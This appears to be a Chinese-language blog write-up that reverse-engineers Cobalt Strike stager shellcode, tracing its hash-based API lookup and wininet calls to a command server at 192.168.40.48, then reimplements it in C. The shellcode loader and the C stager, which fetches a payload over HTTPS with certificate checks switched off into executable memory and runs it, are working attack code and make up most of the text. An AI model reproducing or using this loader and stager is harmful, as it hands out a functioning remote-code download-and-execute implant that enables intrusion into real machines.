0x00 分析样本
#include<stdio.h>``#include<Windows.h>``#pragma comment(linker, "/section:.data,RWE")`
`unsigned char buf[] = "shellcode";`
`int main()``{` `//反调试不是很强的可以用来定位入口点` `printf("hell word!!\r\n");``__asm` `{` `mov eax, offset buf` `jmp eax` `}``}
0x01 分析过程
shellcode入口,开始进行调试
进入0X00D1983F函数,,找到函数后循环都会经过这里push了wininet字符串和0x726774C
进入ebp的call分析
第一次拿的是本身exe
第二次拿的是ntdll.dll
然后拿到ntdll.dll的导出表地址
导出函数个数
然后进行遍历
与0x0726774c进行比较,看是否是需要的函数
最后遍历出来找的是LoadLibrary地址,通过LoadLibrary调用起了wininet.dll
然后遍历拿到 InternetOpenUrlA,并实现调用
再次拿到 InternetConnectA并实现调用,访问ip为“192.168.40.48”
再次拿到HttpOpenRequestA并实现调用网页路径为“/MKMw”
再次拿到InternetSetOptionA并实现调用
再次拿到HttpSendRequestA并实现调用
拿到GetDialogBaseUnits,与上面同理
拿到GetDesktopWindow,与上面同理
拿到InternetFindNextFileA,与上面同理
拿到InternetErrorDlg,与上面同理
拿到VirtualAlloc,与上面同理
拿到InternetReadFile,这是循环在读取
然后放开就直接运行
cs上线
0x02 代码模拟
`char* HttpsGet(const char* szURL, const int port, int nSize, char *UA)``{`
`URL_COMPONENTSA crackedURL = { 0 };` `char szHostName[128];` `char szUrlPath[256];` `crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);` `crackedURL.lpszHostName = szHostName;` `crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);` `crackedURL.lpszUrlPath = szUrlPath;` `crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);` `InternetCrackUrlA(szURL, (DWORD)strlen(szURL), 0, &crackedURL);`
`// Start of the internet session` `HINTERNET hInternet = InternetOpenA(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);`
`// HTTPS version` `HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);` `HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);`
`DWORD dwFlags;` `DWORD dwBuffLen = sizeof(dwFlags);` `BOOL bRet = InternetQueryOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);`
`if (!bRet) {` `printf("Failed to query internet options. Error: %d", GetLastError());` `return NULL;` `}`
`dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;` `dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;` `dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;`
`bRet = InternetSetOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));` `if (!bRet) {` `printf("Failed to set internet options. Error: %d", GetLastError());` `return NULL;` `}`
`// Send HTTP request` `HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);`
`LPVOID p = VirtualAlloc(NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);`
`DWORD dwRealWord;`
`for (int i = 0; i < 32; i++) {` `BOOL response = InternetReadFile(hHttpRequest, (LPVOID)((int)p + i * 0x2000), 0x2000, &dwRealWord);` `}`
`InternetCloseHandle(hHttpRequest);` `InternetCloseHandle(hHttpSession);` `InternetCloseHandle(hInternet);`
`((void(WINAPI*)(void))p)();`
`return NULL;``}`
c代码简单模拟,shellcode请求并上线
0x03 成果